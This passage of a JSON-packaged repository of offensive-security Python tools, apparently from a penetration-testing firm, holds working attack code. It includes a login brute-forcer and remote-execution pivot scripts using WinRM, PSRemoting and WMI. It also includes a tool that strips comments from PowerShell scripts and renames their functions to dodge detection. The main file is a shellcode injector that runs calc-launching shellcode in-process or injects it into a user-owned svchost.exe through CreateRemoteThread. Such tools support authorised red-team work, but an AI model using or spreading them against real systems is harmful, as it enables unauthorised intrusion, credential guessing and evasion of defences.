THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(url, user_file, password_file):\r\n\tusers = []\r\n\tpasswords = []\r\n\r\n\twith open(user_file, 'r') as u_file:\r\n\t\tusers = [x.strip() for x in u_file.readlines()]\r\n\r\n\twith open(password_file, 'r') as p_file:\r\n\t\tpasswords = [x.strip() for x in p_file.readlines()]\r\n\r\n\tfor user in users:\r\n\t\tprint(f'Trying username: {user}')\r\n\t\tfor password in passwords:\r\n\t\t\tresult = check_auth(url, user, password)\r\n\t\t\tif result:\r\n\t\t\t\tprint(f'Success! {user} -> {password}')\r\n\r\ndef check_auth(url, user, password):\r\n\tcustom_headers = {'user-agent':'custom agent'}\r\n\tpayload = {'username':user, 'password':password}\r\n\tresponse = requests.post(url, headers=custom_headers, data=payload)\r\n\tif response.status_code == 200:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\r\nif __name__ == '__main__':\r\n\turl = sys.argv[1]\r\n\tuser_file = sys.argv[2]\r\n\tpassword_file = sys.argv[3]\r\n\tmain(url, user_file, password_file)\r\n"
  },
  {
    "path": "pivot_psremoting.py",
    "content": "from pypsrp.powershell import PowerShell, RunspacePool\r\nfrom pypsrp.wsman import WSMan\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host, username, password, command):\r\n\twsman = WSMan(host, username=username,\r\n\t\t\t\t  password=password,\r\n\t\t\t\t  cert_validation=False)\r\n\r\n\twith RunspacePool(wsman) as pool:\r\n\t\tps = PowerShell(pool)\r\n\t\tps.add_cmdlet(command)\r\n\t\tps.invoke()\r\n\r\n\t\tprint(ps.output[0])\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\tusername = sys.argv[2]\r\n\tpassword = sys.argv[3]\r\n\tcommand = sys.argv[4]\r\n\r\n\tmain(host, username, password, command)"
  },
  {
    "path": "pivot_winrm.py",
    "content": "from winrm.protocol import Protocol\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(computer, username, password, command):\r\n\tp = Protocol(\r\n\t\tendpoint='https://{}:5986/wsman'.format(computer),\r\n\t\ttransport='ntlm',\r\n\t\tusername=username,\r\n\t\tpassword=password,\r\n\t\tserver_cert_validation='ignore'\r\n\t)\r\n\r\n\tshell_id = p.open_shell()\r\n\t#command_id = p.run_command(shell_id, 'query', ['user'])\r\n\tcommand_id = p.run_command(shell_id, command, [])\r\n\tstd_out, std_err, status_code = p.get_command_output(shell_id, command_id)\r\n\tp.cleanup_command(shell_id, command_id)\r\n\tp.close_shell(shell_id)\r\n\r\n\t# pywinrm returns the streams as bytes; show the command's output and exit status\r\n\tprint(std_out.decode(errors='replace'))\r\n\tif std_err:\r\n\t\tprint(std_err.decode(errors='replace'), file=sys.stderr)\r\n\tprint('Exit status: {}'.format(status_code))\r\n\r\nif __name__ == '__main__':\r\n\tcomputer = sys.argv[1]\r\n\tusername = sys.argv[2]\r\n\tpassword = sys.argv[3]\r\n\tcommand = sys.argv[4]\r\n\r\n\tmain(computer, username, password, command)"
  },
  {
    "path": "pivot_wmi.py",
    "content": "from socket import *\r\nimport wmi\r\nimport time\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE \r\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\n\r\ndef main(host, username, password, command_path):\r\n\tSW_SHOWNORMAL = 1\r\n\r\n\tc = wmi.WMI(host, user=username, password=password)\r\n\tprocess_startup = c.Win32_ProcessStartup.new()\r\n\tprocess_startup.ShowWindow = SW_SHOWNORMAL\r\n\tprocess_id, result = c.Win32_Process.Create(CommandLine=command_path,ProcessStartupInformation=process_startup)\r\n\r\n\tif result == 0:\r\n\t\tprint(\"Execution success: {} pid\".format(process_id))\r\n\telse:\r\n\t\tprint(\"Execution failed: {}\".format(result))\r\n\r\nif __name__ == '__main__':\r\n\thost = sys.argv[1]\r\n\tusername = sys.argv[2]\r\n\tpassword = sys.argv[3]\r\n\tcommand_path = sys.argv[4]\r\n\r\n\tmain(host, username, password, command_path)"
  },
  {
    "path": "powerstrip.py",
    "content": "#!/usr/bin/env python3\r\n\r\nimport argparse\r\nimport sys\r\nimport re\r\nimport os\r\n__version__ = '1.0.3'\r\n__author__ = 'Joff Thyer'\r\n\r\n\r\nclass PowerStrip():\r\n\r\n    functions = {}\r\n\r\n    def __init__(self, filename, stutter=False):\r\n        self.filename = filename\r\n        self.stutter = stutter\r\n        try:\r\n            rootname, ext = os.path.basename(filename).split('.')\r\n        except Exception as e:\r\n            print('{}: ps1 extension?'.format(e))\r\n            sys.exit(1)\r\n        self.outputfile = '{}-stripped.{}'.format(rootname, ext)\r\n        self.run()\r\n\r\n    def run(self):\r\n        print('[*] Reading Input file: {}'.format(self.filename))\r\n        infile = open(self.filename, 'rt')\r\n        self.contents = infile.readlines()\r\n        infile.close()\r\n        self.process_file()\r\n        print('[*] Writing Output file: {}'.format(self.outputfile))\r\n        outfile = open(self.outputfile, 'wt')\r\n        outfile.writelines(self.results)\r\n        outfile.close()\r\n\r\n    def process_file(self):\r\n        self.results = []\r\n        skip = False\r\n        rxp = re.compile(r'function\\s([A-Za-z]+-[A-Za-z]+)')\r\n        for line in self.contents:\r\n            if self.stutter:\r\n                m = rxp.match(line)\r\n                if m:\r\n                    self.functions[m.group(1)] = True\r\n            if '<#' in line:\r\n                skip = True\r\n                continue\r\n            elif '#>' in line:\r\n                skip = False\r\n                continue\r\n            elif re.match(r'^\\s*#.*$', line):\r\n                continue\r\n            if not skip:\r\n                self.results.append(line)\r\n\r\n        print('[*] {} lines in original script.'.format(len(self.contents)))\r\n        print('[*] {} lines in new script.'.format(len(self.results)))\r\n        print('[*] {} total lines removed.'.format(len(self.contents) - len(self.results)))\r\n\r\n        if not self.stutter:\r\n            return\r\n\r\n        print('[*] Detected Function Names:')\r\n        out = ''\r\n        for f in sorted(self.functions.keys()):\r\n            out += '{}, '.format(f)\r\n            if len(out) > 60:\r\n                print('    [+] {}'.format(out))\r\n                out = ''\r\n        if len(out) < 60:\r\n            print('    [+] {}'.format(out[:-2]))\r\n        # fix function names\r\n        replaced = 0\r\n        for i, line in enumerate(self.results):\r\n            for f in self.functions:\r\n                if f in line:\r\n                    self.results[i] = line.replace(f, f[0] + f)\r\n                    replaced += 1\r\n        print('[*] {} total function names detected.'.format(len(self.functions)))\r\n        print('[*] {} function name substitutions.'.format(replaced))\r\n\r\nif __name__ == '__main__':\r\n    progname = os.path.basename(sys.argv[0]).split('.')[0].title()\r\n    banner = '''\\\r\n[*] --------------------------------------------\r\n[*]   {}, Version: {}\r\n[*]   Author: {}, (c) 2020\r\n[*] --------------------------------------------\r\n'''.format(progname, __version__, __author__)\r\n    print(banner)\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('filename')\r\n    parser.add_argument(\r\n        '-s', '--stutter', default=False, action='store_true',\r\n        help='''\\\r\nModify function names by adding additional letter at beginning.\r\n\"Invoke-Fun\" becomes \"IInvoke-Fun\" for example.'''\r\n    )\r\n    args = parser.parse_args()\r\n    ps = PowerStrip(args.filename, args.stutter)"
  },
  {
    "path": "pyinjector.py",
    "content": "from __future__ import print_function\r\nimport ctypes\r\nimport ctypes.wintypes as wt\r\nimport psutil\r\nimport random\r\nimport os\r\nimport platform\r\nimport sys\r\ntry:\r\n    input = raw_input\r\nexcept:\r\n    pass\r\n\r\n\r\nclass InjectProcess():\r\n    calc_x86 = \"\"\r\n    calc_x86 += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\n    calc_x86 += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\n    calc_x86 += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\n    calc_x86 += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\n    calc_x86 += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\n    calc_x86 += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\n    calc_x86 += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\n    calc_x86 += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\n    calc_x86 += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\n    calc_x86 += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\n    calc_x86 += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\n    calc_x86 += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\n    calc_x86 += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\n    calc_x86 += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\n    calc_x86 += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n    calc_x64 = \"\"\r\n    calc_x64 += \"\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc0\\x00\\x00\\x00\\x41\\x51\\x41\"\r\n    calc_x64 += \"\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\"\r\n    calc_x64 += \"\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\"\r\n    calc_x64 += 
\"\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\"\r\n    calc_x64 += \"\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\"\r\n    calc_x64 += \"\\x41\\x51\\x48\\x8b\\x52\\x20\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\"\r\n    calc_x64 += \"\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x67\\x48\\x01\\xd0\"\r\n    calc_x64 += \"\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\\x49\\x01\\xd0\\xe3\\x56\"\r\n    calc_x64 += \"\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\x4d\\x31\\xc9\"\r\n    calc_x64 += \"\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\x38\\xe0\"\r\n    calc_x64 += \"\\x75\\xf1\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\\x75\\xd8\\x58\"\r\n    calc_x64 += \"\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x41\\x8b\\x0c\\x48\\x44\"\r\n    calc_x64 += \"\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\\x01\\xd0\"\r\n    calc_x64 += \"\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5a\"\r\n    calc_x64 += \"\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\\x59\\x5a\\x48\"\r\n    calc_x64 += \"\\x8b\\x12\\xe9\\x57\\xff\\xff\\xff\\x5d\\x48\\xba\\x01\\x00\\x00\"\r\n    calc_x64 += \"\\x00\\x00\\x00\\x00\\x00\\x48\\x8d\\x8d\\x01\\x01\\x00\\x00\\x41\"\r\n    calc_x64 += \"\\xba\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x41\"\r\n    calc_x64 += \"\\xba\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\"\r\n    calc_x64 += \"\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\"\r\n    calc_x64 += \"\\x00\\x59\\x41\\x89\\xda\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\"\r\n    calc_x64 += \"\\x78\\x65\\x00\"\r\n\r\n    PROCESS_SOME_ACCESS = 0x000028\r\n    MEM_COMMIT = 0x1000\r\n    MEM_RESERVE = 0x2000\r\n    MEM_COMMIT_RESERVE = 0x3000\r\n\r\n    PAGE_READWRITE = 0x04\r\n    PAGE_READWRITE_EXECUTE = 0x40\r\n    PAGE_READ_EXECUTE = 0x20\r\n\r\n    def __init__(self, shellcode=None):\r\n        self.kernel32 = ctypes.windll.kernel32\r\n        
self.kernel32_function_definitions()\r\n        domain = os.getenv('USERDOMAIN')\r\n        name = os.getenv('USERNAME')\r\n        self.username = '{}\\\\{}'.format(domain, name).lower()\r\n        if shellcode is None and platform.architecture()[0] == '64bit':\r\n            print('[*] Architecture is 64-bit.')\r\n            self.shellcode = self.calc_x64\r\n        else:\r\n            print('[*] Architecture is 32-bit.')\r\n            self.shellcode = self.calc_x86\r\n\r\n        menu = \"\"\"\r\n____________________________________________________________________\r\n\r\n  Python Proof of Concept Shellcode Injection Techniques\r\n  Author: Joff Thyer (c) 2020, Black Hills Information Security\r\n\r\n  1. Inject Shellcode using VirtualAlloc() within Python process.\r\n  2. Inject Shellcode using a created Heap within Python process.\r\n  3. Find a process that the user owns, and use CreateRemoteThread().\r\n\r\n  9. Exit Program\r\n_____________________________________________________________________\r\n\r\n        \"\"\"\r\n\r\n        done = False\r\n        while not done:\r\n            print(menu)\r\n            try:\r\n                s = int(input(\"  Enter your selection: \"))\r\n            except:\r\n                continue\r\n            if s == 1:\r\n                self.same_process_virtualalloc()\r\n            elif s == 2:\r\n                self.same_process_heapalloc()\r\n\r\n            elif s == 3:\r\n                self.inject_process_CreateRemoteThread()\r\n            elif s == 9:\r\n                done = True\r\n\r\n    def kernel32_function_definitions(self):\r\n        # Define argument types for Kernel32 functions\r\n\r\n        # CloseHandle()\r\n        self.CloseHandle = ctypes.windll.kernel32.CloseHandle\r\n        self.CloseHandle.argtypes = [wt.HANDLE]\r\n        self.CloseHandle.restype = wt.BOOL\r\n\r\n        # CreateThread()\r\n        self.CreateThread = ctypes.windll.kernel32.CreateThread\r\n        
self.CreateThread.argtypes = [\r\n            wt.LPVOID, ctypes.c_size_t, wt.LPVOID,\r\n            wt.LPVOID, wt.DWORD, wt.LPVOID\r\n        ]\r\n        self.CreateThread.restype = wt.HANDLE\r\n\r\n        # CreateRemoteThread()\r\n        self.CreateRemoteThread = ctypes.windll.kernel32.CreateRemoteThread\r\n        self.CreateRemoteThread.argtypes = [\r\n            wt.HANDLE, wt.LPVOID, ctypes.c_size_t,\r\n            wt.LPVOID, wt.LPVOID, wt.DWORD, wt.LPVOID\r\n        ]\r\n        self.CreateRemoteThread.restype = wt.HANDLE\r\n\r\n        # HeapAlloc()\r\n        self.HeapAlloc = ctypes.windll.kernel32.HeapAlloc\r\n        self.HeapAlloc.argtypes = [wt.HANDLE, wt.DWORD, ctypes.c_size_t]\r\n        self.HeapAlloc.restype = wt.LPVOID\r\n\r\n        # HeapCreate()\r\n        self.HeapCreate = ctypes.windll.kernel32.HeapCreate\r\n        self.HeapCreate.argtypes = [wt.DWORD, ctypes.c_size_t, ctypes.c_size_t]\r\n        self.HeapCreate.restype = wt.HANDLE\r\n\r\n        # OpenProcess()\r\n        self.OpenProcess = ctypes.windll.kernel32.OpenProcess\r\n        self.OpenProcess.argtypes = [wt.DWORD, wt.BOOL, wt.DWORD]\r\n        self.OpenProcess.restype = wt.HANDLE\r\n\r\n        # RtlMoveMemory()\r\n        self.RtlMoveMemory = ctypes.windll.kernel32.RtlMoveMemory\r\n        self.RtlMoveMemory.argtypes = [wt.LPVOID, wt.LPVOID, ctypes.c_size_t]\r\n        self.RtlMoveMemory.restype = wt.LPVOID\r\n\r\n        # VirtualAlloc()\r\n        self.VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc\r\n        self.VirtualAlloc.argtypes = [\r\n            wt.LPVOID, ctypes.c_size_t, wt.DWORD, wt.DWORD\r\n        ]\r\n        self.VirtualAlloc.restype = wt.LPVOID\r\n\r\n        # VirtualAllocEx()\r\n        self.VirtualAllocEx = ctypes.windll.kernel32.VirtualAllocEx\r\n        self.VirtualAllocEx.argtypes = [\r\n            wt.HANDLE, wt.LPVOID, ctypes.c_size_t,\r\n            wt.DWORD, wt.DWORD\r\n        ]\r\n        self.VirtualAllocEx.restype = wt.LPVOID\r\n\r\n        
# VirtualFreeEx()\r\n        self.VirtualFreeEx = ctypes.windll.kernel32.VirtualFreeEx\r\n        self.VirtualFreeEx.argtypes = [\r\n            wt.HANDLE, wt.LPVOID, ctypes.c_size_t, wt.DWORD\r\n        ]\r\n        self.VirtualFreeEx.restype = wt.BOOL\r\n\r\n        # VirtualProtect()\r\n        self.VirtualProtect = ctypes.windll.kernel32.VirtualProtect\r\n        self.VirtualProtect.argtypes = [\r\n            wt.LPVOID, ctypes.c_size_t, wt.DWORD, wt.LPVOID\r\n        ]\r\n        self.VirtualProtect.restype = wt.BOOL\r\n\r\n        # VirtualProtectEx()\r\n        self.VirtualProtectEx = ctypes.windll.kernel32.VirtualProtectEx\r\n        self.VirtualProtectEx.argtypes = [\r\n            wt.HANDLE, wt.LPVOID, ctypes.c_size_t,\r\n            wt.DWORD, wt.LPVOID\r\n        ]\r\n        self.VirtualProtectEx.restype = wt.BOOL\r\n\r\n        # WaitForSingleObject\r\n        self.WaitForSingleObject = self.kernel32.WaitForSingleObject\r\n        self.WaitForSingleObject.argtypes = [wt.HANDLE, wt.DWORD]\r\n        self.WaitForSingleObject.restype = wt.DWORD\r\n\r\n        # WriteProcessMemory()\r\n        self.WriteProcessMemory = self.kernel32.WriteProcessMemory\r\n        self.WriteProcessMemory.argtypes = [\r\n            wt.HANDLE, wt.LPVOID, wt.LPCVOID,\r\n            ctypes.c_size_t, wt.LPVOID\r\n        ]\r\n        self.WriteProcessMemory.restype = wt.BOOL\r\n\r\n    def select_pid(self):\r\n        candidates = {}\r\n        for pid in psutil.pids():\r\n            p = psutil.Process(pid)\r\n            try:\r\n                name = p.name()\r\n                username = p.username().lower()\r\n            except:\r\n                continue\r\n            if self.username == username and name == 'svchost.exe':\r\n                candidates[pid] = name\r\n        choice = random.choice(list(candidates.keys()))\r\n        print('[*] Selected Process ID: {} ({}) to Inject'.format(\r\n            choice, candidates[choice]\r\n        ))\r\n        return 
int(choice)\r\n\r\n    def same_process_virtualalloc(self):\r\n        print(\"\"\"\r\n[*] =============================================\r\n[*]  Shellcode Resident in Same Process using\r\n[*]  VirtualAlloc()/CreateThread()!\r\n[*] =============================================\"\"\")\r\n        memptr = self.VirtualAlloc(\r\n            0, len(self.shellcode),\r\n            self.MEM_COMMIT, self.PAGE_READWRITE_EXECUTE\r\n        )\r\n        print('[*] VirtuallAlloc() Memory at: {:08X}'.format(memptr))\r\n        self.RtlMoveMemory(memptr, self.shellcode, len(self.shellcode))\r\n        print('[*] Shellcode copied into memory.')\r\n        self.VirtualProtect(memptr, len(self.shellcode), self.PAGE_READ_EXECUTE, 0)\r\n        print('[*] Changed permissions on memory to READ_EXECUTE only.')\r\n        thread = self.CreateThread(0, 0, memptr, 0, 0, 0)\r\n        print('[*] CreateThread() in same process.')\r\n        self.WaitForSingleObject(thread, 0xFFFFFFFF)\r\n\r\n    def same_process_heapalloc(self):\r\n        print(\"\"\"\r\n[*] ===========================================\r\n[*]  Shellcode Resident in Same Process using \r\n[*]  HeapAlloc()/CreateThread()!'\r\n[*] ===========================================\"\"\")\r\n        heap = self.HeapCreate(0x00040000, len(self.shellcode), 0)\r\n        self.HeapAlloc(heap, 0x00000008, len(self.shellcode))\r\n        print('[*] HeapAlloc() Memory at: {:08X}'.format(heap))\r\n        self.RtlMoveMemory(heap, self.shellcode, len(self.shellcode))\r\n        print('[*] Shellcode copied into memory.')\r\n        thread = self.CreateThread(0, 0, heap, 0, 0, 0)\r\n        print('[*] CreateThread() in same process.')\r\n        self.WaitForSingleObject(thread, 0xFFFFFFFF)\r\n\r\n    def inject_process_CreateRemoteThread(self):\r\n        print(\"\"\"\r\n[*] =======================================================\r\n[*] Find a process to inject shellcode into using process\r\n[*] listing, then VirtualAllocEx(), 
WriteProcessMemory(),\r\n[*] CreateRemoteThread()\r\n[*] =======================================================\"\"\")\r\n        pid = self.select_pid()\r\n        ph = self.kernel32.OpenProcess(self.PROCESS_SOME_ACCESS, False, pid)\r\n        print('[*] Process handle is: 0x{:06X}'.format(ph))\r\n        if ph == 0:\r\n            return\r\n\r\n        memptr = self.VirtualAllocEx(\r\n            ph, 0, len(self.shellcode),\r\n            self.MEM_COMMIT_RESERVE,\r\n            self.PAGE_READWRITE\r\n        )\r\n        print('[*] VirtualAllocEx() memory at: 0x{:08X}'.format(memptr))\r\n        if memptr == 0:\r\n            return\r\n\r\n        nbytes = ctypes.c_int(0)\r\n        result = self.WriteProcessMemory(\r\n            ph, memptr, self.shellcode,\r\n            len(self.shellcode), ctypes.byref(nbytes)\r\n        )\r\n        print('[+] Bytes written = {}'.format(nbytes.value))\r\n        if result == 0:\r\n            print(\"[-] WriteProcessMemory() Failed - Error Code: {}\".format(\r\n                self.kernel32.GetLastError()\r\n            ))\r\n            return\r\n\r\n        old_protection = ctypes.pointer(wt.DWORD())\r\n        result = self.VirtualProtectEx(\r\n            ph, memptr, len(self.shellcode),\r\n            self.PAGE_READ_EXECUTE, old_protection\r\n        )\r\n        if result == 0:\r\n            print(\"[-] VirtualProtectEx() Failed - Error Code: {}\".format(\r\n                self.kernel32.GetLastError()\r\n            ))\r\n            return\r\n        th = self.CreateRemoteThread(ph, None, 0, memptr, None, 0, None)\r\n        if th == 0:\r\n            print(\"[-] CreateRemoteThread() Failed - Error Code: {}\".format(\r\n                self.kernel32.GetLastError()\r\n            ))\r\n            return\r\n        self.VirtualFreeEx(ph, memptr, 0, 0xC000)\r\n        self.CloseHandle(ph)\r\n\r\n\r\nif __name__ == '__main__':\r\n    InjectProcess()"
  },
  {
    "path": "pymeta.py",
    "content": "import os\r\nimport re\r\nimport argparse\r\nimport zipfile\r\nimport PyPDF2\r\nfrom lxml import etree as ET\r\n\r\n\r\nclass PyMetaExtractor():\r\n    # Walk a directory tree and dump document metadata (author, company,\r\n    # creating application, timestamps) from Office OpenXML and PDF files.\r\n\r\n    ext = ['docx', 'xlsx', 'pptx', 'pdf']\r\n    # Match case-insensitively so files saved as .DOCX or .Pdf are not skipped.\r\n    rexp = re.compile(r'.+\\.({})$'.format('|'.join(ext)), re.IGNORECASE)\r\n\r\n    def __init__(self, directory):\r\n        self.directory = os.path.abspath(directory)\r\n        print(\"[*] Starting to search from: [{}]\".format(self.directory))\r\n\r\n    def run(self):\r\n        for cwd, lod, lof in os.walk(self.directory):\r\n            for f in lof:\r\n                m = self.rexp.match(f)\r\n                if not m:\r\n                    continue\r\n                fullpath = os.path.join(cwd, f)\r\n                try:\r\n                    print('[*] {}'.format(fullpath))\r\n                    if m.group(1).lower() == 'pdf':\r\n                        self.pdf(fullpath)\r\n                    else:\r\n                        self.openxml(fullpath)\r\n                    print('')\r\n                except Exception as e:\r\n                    # Corrupt or encrypted files are reported, not silently skipped.\r\n                    print('    [-] unable to read metadata: {}'.format(e))\r\n                    continue\r\n\r\n    def openxml(self, pathname):\r\n        # OpenXML documents are zip archives; the core properties live in docProps/core.xml.\r\n        with zipfile.ZipFile(pathname, 'r') as zf:\r\n            docprops = ET.fromstring(zf.read('docProps/core.xml'))\r\n        for meta in docprops.findall('*'):\r\n            # Strip the XML namespace: '{http://...}creator' -> 'Creator'.\r\n            if meta.tag[0] == '{':\r\n                tag = meta.tag.split('}')[1].title()\r\n            else:\r\n                tag = meta.tag.title()\r\n            value = meta.text\r\n            print('    [+] {:15s} => {}'.format(tag, value))\r\n\r\n    def pdf(self, pathname):\r\n        reader = PyPDF2.PdfFileReader(pathname)\r\n        meta = reader.getDocumentInfo()\r\n        for key in meta:\r\n            tag = key.lstrip('/')\r\n            value = meta[key]\r\n            print('    [+] {:15s} => {}'.format(tag, value))\r\n\r\n\r\nif __name__ == '__main__':\r\n    print('''\r\n_______________________________________\r\n\r\n    PyMeta version 1.0\r\n    Author: Joff Thyer (c) 2020\r\n    Black Hills Information Security\r\n_______________________________________\r\n''')\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('directory', help='starting directory')\r\n    args = parser.parse_args()\r\n    pm = PyMetaExtractor(args.directory)\r\n    pm.run()"
  },
  {
    "path": "requirements.txt",
    "content": "pywinrm\r\npypsrp\r\nwmi\r\nboto3\r\nazure\r\noauth2client\r\nlxml\r\nPyPDF2\r\nrequests\r\nrequestium\r\nselenium\r\nbs4\r\nscapy\r\nshodan\r\n"
  },
  {
    "path": "shodan_search.py",
    "content": "from shodan import Shodan\r\nimport sys\r\n\r\n'''\r\nAuthor: Mike Felch (c) 2020, @ustayready\r\n-\r\nCopyright 2020 Mike Felch\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"),\r\nto deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, \r\nDAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF 